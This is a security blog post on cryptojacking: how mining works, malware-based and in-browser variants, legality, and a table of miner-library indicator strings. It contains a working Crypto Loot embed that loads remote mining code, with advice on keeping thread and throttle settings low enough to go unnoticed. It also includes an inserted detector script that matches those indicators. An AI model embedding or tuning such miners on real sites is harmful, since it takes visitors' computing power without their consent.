
Cryptojacking, a Real Malware?

Before we begin, we need a brief definition of blockchain. It is simply
a unique, consensual, and distributed registry on the network that
allows storage of information that cannot be modified, lost or deleted.
It is used in the health sector, smart contracts, intellectual property
management, and cryptocurrencies, the last being its most common use.

In the field of cryptocurrencies, a blockchain stores all transactions
made with a cryptocurrency. The security and integrity of these systems
are maintained by nodes, which are computers connected to the blockchain
network competing with each other to verify transactions. This process
is known as mining and is carried out by providing processing power with
either CPUs, GPUs, or by using specialized hardware for this type of
task.

Usually, nodes join together in groups that cooperate to validate a
batch of transactions. When these transactions are validated, each node
is rewarded in proportion to the processing power it contributed.

Concept

When mining cryptocurrency, keep in mind that CPU or GPU usage rises
during the process, and so does electricity consumption.

Now, what if I tell you that others can provide that processing power
for you, and even better, without you having to share the profits with
them? It sounds pretty good, and it’s simple to implement, with two
variations:

  • The first is carried out by infecting a victim’s machine with
    malware. Usually, this is done by social engineering. We can make a
    victim, without their knowledge, download malware that executes the
    mining process in the background.

  • The other variation is in-browser mining. This executes code in the
    user’s browser when the user is accessing a particular site. In this
    case, JavaScript is used to execute such scripts.

Discussion

On one hand, some people prefer that their CPU be used 100% of the
time, without having to deal with ads and pop-ups on every new page.

On the other hand, antivirus companies periodically update their
definition of malware and include web miners as a potential threat to a
user’s system.

According to reports by Cointelegraph [1], Monero (the currency most
affected by this kind of mining) plans to reinforce its algorithm by
requiring miners to dedicate over two gigabytes of RAM to the process,
which could make cryptojacking attempts harder to hide.

How the scripts are used determines whether the usage is legal or not.
There are cases where attackers inject mining code into websites
through XSS and profit from it without the consent of the website
administrator.

As noted above, with social engineering techniques, the attacker could
make victims download malicious programs to perform mining without
consent.

Tools

There are many tools that can be used to perform in-browser mining.
Coinhive had been one of the most used, but since March 2019 it has
stopped working.

However, there are other tools that are quite similar. Table 1 below,
based on a scan made with publicWWW, shows the approximate number of
websites using these tools.

Table 1. Quantity of websites per library [2]

| Website           | Results | Query parameter |
|-------------------|---------|-----------------|
| Coinhive          | 30611   | "coinhive.min.js" |
| JSEcoin           | 1131    | "load.jsecoin.com" |
| Crypto-Loot       | 695     | "CryptoLoot.Anonymous" |
| Minr              | 324     | "minr.pw", "st.kjli.fi", "abc.pema.cl", "metrika.ron.si", "cdn.rove.cl", "host.d-ns.ga", "static.hk.rs", "hallaert.online", "cnt.statistic.date", "cdn.static-cnt.bid" |
| CoinImp           | 317     | "www.coinimp.com/scripts/min.js" |
| ProjectPoi (PPoi) | 116     | "projectpoi.min" |
| AFMiner           | 46      | "afminer.com/code/miner.php" |
| Papoto            | 42      | "papoto.com/lib/papoto.js" |

In the following example, a test is shown using Crypto Loot, a library
that has been replacing Coinhive. It is very easy to add to any
application by inserting the following code.

In-browser mining script:

    <script src="//statdynamic.com/lib/crypta.js"></script>
    <script>
      var miner = new CRLT.Anonymous('15837bc7758859e913c5ccc2d292a9f1e54775389d5',
        { threads: 4, throttle: 0.2, coin: "xmr" });
      miner.start();
    </script>

When a user visits the application, CPU usage quickly rises. The
recommended number of threads, if the script is to go unnoticed, is
between 2 and 4. The throttle, which caps CPU usage, is set here to 0.2
(about 80% CPU); 0.0 is full speed and is the least recommended
setting.
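As an added, defender-side example (not code from the original post or from any of the libraries it names), the following JavaScript scans page HTML for the indicator strings from Table 1 and for the Crypto Loot loader and constructor shown above, and reports the configured threads and throttle; the sample page and its site key are constructed placeholders.

```javascript
// Indicator strings from Table 1 (publicWWW query parameters) plus the
// Crypto-Loot snippet in the post (statdynamic.com loader, CRLT.Anonymous).
const MINER_INDICATORS = {
  'Coinhive': ['coinhive.min.js'],
  'JSEcoin': ['load.jsecoin.com'],
  'Crypto-Loot': ['CryptoLoot.Anonymous', 'statdynamic.com/lib/crypta.js', 'CRLT.Anonymous'],
  'Minr': ['minr.pw', 'st.kjli.fi', 'abc.pema.cl', 'metrika.ron.si', 'cdn.rove.cl',
           'host.d-ns.ga', 'static.hk.rs', 'hallaert.online', 'cnt.statistic.date',
           'cdn.static-cnt.bid'],
  'CoinImp': ['www.coinimp.com/scripts/min.js'],
  'ProjectPoi': ['projectpoi.min'],
  'AFMiner': ['afminer.com/code/miner.php'],
  'Papoto': ['papoto.com/lib/papoto.js'],
};

// Pull threads/throttle out of a Coinhive-style "new X.Anonymous(key, {...})"
// call so the report shows how aggressively the miner is configured.
// Returns null when no such call is present.
function extractMinerConfig(html) {
  const m = /new\s+\w+\.Anonymous\s*\(\s*['"][^'"]+['"]\s*,\s*\{([^}]*)\}/i.exec(html);
  if (!m) return null;
  const num = (key) => {
    const r = new RegExp(key + '\\s*:\\s*([0-9.]+)').exec(m[1]);
    return r ? Number(r[1]) : null;
  };
  return { threads: num('threads'), throttle: num('throttle') };
}

// Scan a page body; returns the miner families found (with the strings that
// matched) and the constructor config. Case-insensitive substring matching is
// cheap enough to run over every HTML response in a proxy or CI check.
function scanForMiners(html) {
  const lower = html.toLowerCase();
  const families = [];
  for (const [family, needles] of Object.entries(MINER_INDICATORS)) {
    const hits = needles.filter((n) => lower.includes(n.toLowerCase()));
    if (hits.length) families.push({ family, matched: hits });
  }
  return { families, config: extractMinerConfig(html) };
}

// Constructed sample page: the post's Crypto-Loot snippet with a placeholder
// site key (not a real key).
const SAMPLE_PAGE = '<html><body><h1>Hi</h1>' +
  '<script src="//statdynamic.com/lib/crypta.js"></script>' +
  '<script>var miner = new CRLT.Anonymous("SITE_KEY_PLACEHOLDER", ' +
  '{ threads:4,throttle:0.2, coin: "xmr" }); miner.start();</script></body></html>';

console.log(JSON.stringify(scanForMiners(SAMPLE_PAGE)));
```

Substring matching on known loader hosts is a quick audit, not a complete defense: obfuscated or self-hosted copies of these libraries will not match and need behavioural checks (sustained CPU from a tab, WebAssembly workers, WebSocket traffic to a pool proxy).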

Figure 1. CPU usage while visiting a website with the in-browser mining script.

Collected earnings and processing power can be seen on the
dashboard of the person who
inserted the script.

Conclusion

The use of services such as Crypto Loot can be legal. They are
considered malware when used on users’ systems without their knowledge.
It is our responsibility to inform users about what is happening and to
provide them with statistics on the processing power used for mining.

In order for these mining methods to be legitimate and therefore, legal,
users must receive a notification about the execution of these scripts,
as well as the option to disable them and stop mining.

So far, there are few websites where the user is not actually informed
of the use of these scripts. Here is where antivirus companies disagree.
Some antivirus companies believe excessive CPU usage can cause
intentional damage, while others believe there is no intention to harm
an infected machine’s files; they just make the machine work a little
slower.

Without a doubt, no one wants their machine to work slower, but with
proper configuration of the scripts, you can run a website that
generates profits without having to show annoying ads to visitors and
without excessive CPU usage.

References

  1. Cointelegraph. Monero Developers Consider Adopting New
     Proof-of-Work Algorithm in October.

  2. S. Eskandari, A. Leoutsarakos, T. Mursch and J. Clark (2018). A
     first look at browser-based cryptojacking. 2018 IEEE European
     Symposium on Security and Privacy Workshops (EuroS&PW), 63.

This is a Security Bloggers Network syndicated blog from Fluid Attacks RSS Feed authored by Diego Alvarez. Read the original post at: https://fluidattacks.com/blog/cryptojacking-malware/